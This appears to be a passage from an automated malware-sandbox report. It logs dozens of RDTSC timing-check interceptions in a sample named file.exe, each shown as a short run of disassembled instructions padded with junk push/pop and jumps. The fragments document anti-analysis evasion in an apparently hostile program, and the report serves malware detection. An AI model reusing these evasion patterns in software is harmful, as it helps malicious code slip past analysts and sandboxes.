              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909BDF second address: 909C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F052CBC2118h 0x0000000e jmp 00007F052CBC210Fh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909C0F second address: 909C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F052CEB1F16h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D59 second address: 909D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC210Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D69 second address: 909D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D6D second address: 909D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F052CBC2116h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909D82 second address: 909D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A1CF second address: 90A1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2116h 0x00000009 js 00007F052CBC2106h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A1EF second address: 90A1F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A1F9 second address: 90A203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A203 second address: 90A207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A4E0 second address: 90A4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A65B second address: 90A663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A7A4 second address: 90A7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pop edi 0x00000008 push edi 0x00000009 js 00007F052CBC2121h 0x0000000f jmp 00007F052CBC2115h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BA28 second address: 88BA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F052CEB1F26h 0x0000000c jmp 00007F052CEB1F24h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F303 second address: 90F307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F307 second address: 90F32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F052CEB1F16h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F5B3 second address: 90F5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F5B9 second address: 90F5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F5C3 second address: 90F5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F6EB second address: 90F709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F25h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F709 second address: 90F70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F70D second address: 90F754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F27h 0x00000007 jmp 00007F052CEB1F1Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f jnp 00007F052CEB1F4Eh 0x00000015 jmp 00007F052CEB1F27h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F754 second address: 90F76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2113h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8E8 second address: 90F8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90F8EE second address: 90F8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90FB87 second address: 90FB9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F052CEB1F1Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D544 second address: 88D54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 918152 second address: 918167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F052CEB1F16h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebx 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 918167 second address: 91816B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0B93 second address: 8E0B98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0B98 second address: 8E0B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0B9E second address: 8BEE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D335Dh], edi 0x00000010 call dword ptr [ebp+122D1B3Fh] 0x00000016 push edi 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F052CEB1F1Bh 0x0000001f popad 0x00000020 pop edi 0x00000021 pushad 0x00000022 jmp 00007F052CEB1F25h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F052CEB1F1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E0CF2 second address: 8E0CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E109C second address: 8E10A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F052CEB1F16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E10A6 second address: 8E10AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1240 second address: 8E1244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1244 second address: 8E1254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F052CBC2106h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1254 second address: 8E1267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F052CEB1F1Bh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1267 second address: 8E126B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E15A4 second address: 8E15A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1B72 second address: 8E1BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2118h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F052CBC210Ah 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F052CBC2118h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1BB9 second address: 8E1BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F052CEB1F16h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1BC7 second address: 8E1BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1E2D second address: 8E1E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1E45 second address: 8E1E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC210Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF9A4 second address: 8BF9AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917666 second address: 917670 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CBC2106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9178ED second address: 9178F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9178F3 second address: 9178F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C49E second address: 89C4A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D0A0 second address: 91D0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D0A6 second address: 91D0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D0AA second address: 91D100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2112h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jnp 00007F052CBC2106h 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop edi 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e jmp 00007F052CBC210Bh 0x00000023 popad 0x00000024 pushad 0x00000025 js 00007F052CBC2106h 0x0000002b jmp 00007F052CBC2116h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D267 second address: 91D26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D26D second address: 91D29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F052CBC2106h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007F052CBC2106h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F052CBC2117h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D29B second address: 91D2A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D3CF second address: 91D3EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2112h 0x00000007 jg 00007F052CBC2118h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D562 second address: 91D566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D821 second address: 91D829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D829 second address: 91D83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F052CEB1F1Ch 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D83A second address: 91D844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D844 second address: 91D86F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F1Dh 0x00000007 jmp 00007F052CEB1F22h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F052CEB1F1Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DC84 second address: 91DC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DC88 second address: 91DC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DC8C second address: 91DC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DE14 second address: 91DE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DFC0 second address: 91DFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F052CBC2112h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921765 second address: 92176B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92176B second address: 921775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921775 second address: 92177B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89910B second address: 899111 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9240BC second address: 9240C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9243B0 second address: 9243D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2118h 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnc 00007F052CBC2106h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9243D7 second address: 9243E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F052CEB1F16h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9243E8 second address: 9243F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 jnl 00007F052CBC2106h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92670F second address: 926713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926713 second address: 926719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926719 second address: 92671F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92671F second address: 92675D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F052CBC210Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F052CBC2108h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F052CBC2118h 0x0000001c jc 00007F052CBC2106h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92675D second address: 926774 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9268B4 second address: 9268BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9268BC second address: 9268CC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BC71 second address: 92BC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F052CBC2106h 0x0000000d jmp 00007F052CBC210Ch 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BF38 second address: 92BF56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F052CEB1F21h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BF56 second address: 92BF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BF5B second address: 92BF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BF63 second address: 92BF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BF67 second address: 92BF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FFA9 second address: 92FFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FFB3 second address: 92FFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F69C second address: 92F6A6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F052CBC2112h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F978 second address: 92F97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F97E second address: 92F982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F982 second address: 92F996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F052CEB1F18h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F996 second address: 92F99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F99A second address: 92F99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9331D4 second address: 9331E4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9331E4 second address: 9331E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9331E8 second address: 933200 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F052CBC2106h 0x00000011 je 00007F052CBC2106h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933200 second address: 93320D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007F052CEB1F16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
